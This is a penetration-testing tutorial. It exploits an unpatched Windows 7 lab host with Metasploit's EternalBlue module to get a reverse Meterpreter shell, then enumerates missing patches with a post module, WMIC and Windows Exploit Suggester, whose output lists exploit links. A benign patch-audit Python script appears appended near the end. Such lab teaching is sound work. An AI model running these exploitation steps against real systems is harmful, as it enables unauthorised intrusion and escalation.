
Identifying Missing Windows Patches for Easier Exploitation « Null Byte :: WonderHowTo



No operating system faces as many vulnerabilities as Windows, and it is often a race to publish the latest patches to fix problems. From an attacker's point of view, knowing which patches are present on a Windows machine can make or break successful exploitation. Today we'll cover three methods of patch enumeration: Metasploit, WMIC, and Windows Exploit Suggester.

For Metasploit, we will use a post module to find missing patches. With WMIC, we execute commands directly from a shell on the system to list the installed Quick Fix Engineering (QFE) patches. With Windows Exploit Suggester, we compare the patches installed on the system against a database of Microsoft security bulletins. We will use Kali Linux to attack an unpatched version of Windows 7.

Method 1: Metasploit

The first method we use to identify missing patches on the target is Metasploit. Start it by entering msfconsole in the terminal:

  ~# msfconsole

[-] *** Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > 

We need to compromise the machine and get a meterpreter session to run the post module. Since we know that this is an unpatched version of Windows 7, we can quickly exploit it with EternalBlue.

Load the module with the use command:

  msf5 > use exploit/windows/smb/ms17_010_eternalblue

Set the appropriate options and type run to start the exploit:

  msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.0.1:1337
[+] 10.10.0.104:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49228) at 2019-10-27 12:28:32 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

We now have a Meterpreter session on the target. Because post modules run against an existing session, we first need to background our session:

  meterpreter > background

[*] Backgrounding session 1...

Then we can load the module with the use command:

  msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_patches

When you type options at the prompt, Metasploit displays all available options and settings for the current module:

  msf5 post(windows/gather/enum_patches) > options

Module options (post/windows/gather/enum_patches):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   KB         KB2871997,KB2928120   yes       A comma separated list of KB patches to search for
   MSFLOCALS  true                  yes       Search for missing patches for which there is a MSF local module
   SESSION                          yes       The session to run this module on.

We only need to set the session number on which to run this module. We could specify a comma-separated list of additional patches to look for, but right now the default patches work just fine.

Use the set command to point the module at the session we backgrounded:

  msf5 post(windows/gather/enum_patches) > set session 1

session => 1

Finally, enter run to start the module:

  msf5 post(windows/gather/enum_patches) > run

[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - May be vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - May be vulnerable to MS10-092 Schelevator on Vista, 7, and 2008
[+] KB2592799 - May be vulnerable to MS11-080 if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - May be vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - May be vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - May be vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed

The two default patches are reported as missing, followed by several other absent patches together with the vulnerabilities they may leave the host exposed to.

Method 2: WMIC

The next method of patch enumeration uses the Windows WMIC utility. WMIC (Windows Management Instrumentation Command-line) is a tool that runs WMI operations from the command line. It works like a shell of its own and can be run in both interactive and non-interactive modes.

To use this utility, we need a proper shell on the target. Luckily, a meterpreter session is already running so we can use it to drop into a system shell.

Use the sessions command together with the -i flag to interact with this session:

  msf5 > sessions -i 1

[*] Starting interaction with 1...

meterpreter > 

This brings us back to the Meterpreter prompt. Enter shell and we will be dropped into a system shell:

  meterpreter > shell

Process 2452 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Now we should be able to use WMIC to display all installed patches. At the command prompt, type wmic qfe list to list all QFE (Quick Fix Engineering) patches installed on the system:

  C:\Windows\system32> wmic qfe list

wmic qfe list
Caption                                     CSName  Description  FixComments  HotFixID   InstallDate  InstalledBy        InstalledOn  Name  ServicePackInEffect  Status
http://support.microsoft.com/?kbid=2534111  W02     Hotfix                    KB2534111                                   2/25/2019
http://support.microsoft.com/?kbid=976902   W02     Update                    KB976902                W02\Administrator  11/21/2010

This shows the ID, description, installation details, and associated support URL of each installed patch. We can also append full to the command for a slightly different view of the same data:

  C:\Windows\system32> wmic qfe list full

wmic qfe list full

Caption=http://support.microsoft.com/?kbid=2534111
CSName=W02
Description=Hotfix
FixComments=
HotFixID=KB2534111
InstallDate=
InstalledBy=
InstalledOn=2/25/2019
Name=
ServicePackInEffect=
Status=

Caption=http://support.microsoft.com/?kbid=976902
CSName=W02
Description=Update
FixComments=
HotFixID=KB976902
InstallDate=
InstalledBy=W02\Administrator
InstalledOn=11/21/2010
Name=
ServicePackInEffect=
Status=

This method is useful because only a simple shell is required to run WMIC.

Method 3: Windows Exploit Suggester

The last method to identify missing patches is Windows Exploit Suggester. This is a tool written in Python that compares the patches installed on a target with a database of Microsoft vulnerabilities on our local machine.

Windows Exploit Suggester requires the output of systeminfo from the target to compare against the database. Since we should still have shell access to the target, we can run the following command:

  C:\Windows\system32> systeminfo

systeminfo

Host Name:                 W02
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          admin2
Registered Organization:
Product ID:                00371-868-0000007-85704
Original Install Date:     2/25/2019, 2:04:46 PM
System Boot Time:          10/27/2013, 1:48:26 PM
System Manufacturer:       QEMU
System Model:              Standard PC (i440FX + PIIX, 1996)
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~2533 Mhz
BIOS Version:              SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 4/1/2014
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-06:00) Central Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,461 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,494 MB
Virtual Memory: In Use:    601 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    dlab.env
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.100
                                 IP address(es)
                                 [01]: 10.10.0.104
                                 [02]: fe80::104:336c:a632:e39b

Save the output to a text file on our local machine and check that it arrived intact (the file holds the same systeminfo output shown above):

  ~# cat system_info.txt

Host Name:                 W02
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
...
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
...

Next, we need to download the script from GitHub. The easiest way is with the wget utility:

  ~# wget https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

--2019-10-27 12:38:34--  https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 69175 (68K) [text/plain]
Saving to: 'windows-exploit-suggester.py'

windows-exploit-suggester.py   100%[======================================================================================================================>]  67.55K  --.-KB/s    in 0.07s

2019-10-27 12:38:34 (951 KB/s) - 'windows-exploit-suggester.py' saved [69175/69175]

Then install the dependencies, in this case just the python-xlrd package:

  ~# apt-get install python-xlrd

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  python-xlrd
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 104 kB of archives.
After this operation, 490 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 python-xlrd all 1.1.0-1 [104 kB]
Fetched 104 kB in 1s (144 kB/s)
Selecting previously unselected package python-xlrd.
(Reading database ... 408990 files and directories currently installed.)
Preparing to unpack .../python-xlrd_1.1.0-1_all.deb ...
Unpacking python-xlrd (1.1.0-1) ...
Setting up python-xlrd (1.1.0-1) ...
Processing triggers for man-db (2.8.5-2) ...

Once the tool is set up, we need to generate the Microsoft Security Bulletin database. Windows Exploit Suggester does this automatically with the --update flag:

  ~# python windows-exploit-suggester.py --update

[*] initiating winsploit version 3.3...
[+] writing to file 2019-10-27-mssb.xls
[*] done

Now we are ready to go. All we have to do is run the tool, specifying the systeminfo file we saved and the database file we just created:

  ~# python windows-exploit-suggester.py --database 2019-10-27-mssb.xls --systeminfo system_info.txt

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file

The script executes and returns all the patches missing on our target along with the relevant information and links:

  [+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 2 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 386 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*]   https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker memory corruption

...

[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update for ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[*] done

This method is probably the most thorough, because it compares the target against an up-to-date database of bulletins rather than a fixed list. It also has the advantage of running on our own machine: all it needs from the target is the systeminfo output.
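The comparison at the heart of both the WMIC and Windows Exploit Suggester methods, matching installed KB ids against a list of expected ones, is worth having in a form you control; the Python 3 script below is an added example (not code from the tutorial or from Windows Exploit Suggester) that extracts hotfix ids from systeminfo or wmic qfe list full output and reports which required patches are absent, which is just as useful for auditing your own hosts. Both samples are constructed, and the systeminfo parser assumes the English-locale Hotfix(s) label.

```python
import re

# Constructed sample (not captured from the tutorial's target): the Hotfix(s)
# section of English-locale `systeminfo` output, in the layout systeminfo uses.
SYSTEMINFO_SAMPLE = """\
Host Name:                 W02
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed sample of `wmic qfe list full` output: one Key=Value record per
# hotfix, records separated by blank lines. Only HotFixID= lines are trusted.
WMIC_SAMPLE = """\
Caption=http://support.microsoft.com/?kbid=2534111
Description=Hotfix
HotFixID=KB2534111
InstalledOn=2/25/2019

Caption=http://support.microsoft.com/?kbid=976902
Description=Update
HotFixID=KB976902
InstalledOn=11/21/2010
"""

HOTFIX_HEADER = re.compile(r"^\s*Hotfix\(s\):", re.IGNORECASE)
HOTFIX_ENTRY = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$", re.IGNORECASE)
WMIC_HOTFIXID = re.compile(r"^\s*HotFixID=(KB\d+)\s*$", re.IGNORECASE)

def hotfixes_from_systeminfo(text):
    """Collect KB ids from the indented [NN]: KBxxxx lines that follow the
    Hotfix(s) header; the list ends at the first line of any other shape."""
    found, in_section = set(), False
    for line in text.splitlines():
        if HOTFIX_HEADER.match(line):
            in_section = True
            continue
        if in_section:
            m = HOTFIX_ENTRY.match(line)
            if not m:
                break
            found.add(m.group(1).upper())
    return found

def hotfixes_from_wmic(text):
    """Collect KB ids from the HotFixID=KBxxxx lines of `wmic qfe list full`."""
    return {m.group(1).upper() for m in map(WMIC_HOTFIXID.match, text.splitlines()) if m}

def missing_patches(installed, required):
    """Return the required KB ids (case-insensitive) absent from `installed`, sorted."""
    return sorted({kb.upper() for kb in required} - set(installed))

if __name__ == "__main__":
    installed = hotfixes_from_systeminfo(SYSTEMINFO_SAMPLE) | hotfixes_from_wmic(WMIC_SAMPLE)
    print("missing:", missing_patches(installed, ["KB2871997", "KB2928120", "KB976902"]))
```

The required list in the usage block is the enum_patches module's two default KBs plus one that the sample host does have, so only the first two are reported.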

Summary

In this tutorial, we looked at a few ways to detect missing patches on a Windows computer. First we used a Metasploit post module, then the WMIC utility on Windows, and finally the Windows Exploit Suggester Python script. Enumerating patches is extremely important when attacking Windows because it narrows down the number of candidate exploits, saves time, and generally simplifies the work.

Cover image by Breakingpic/Pexels; screenshots by drd_/Null Byte

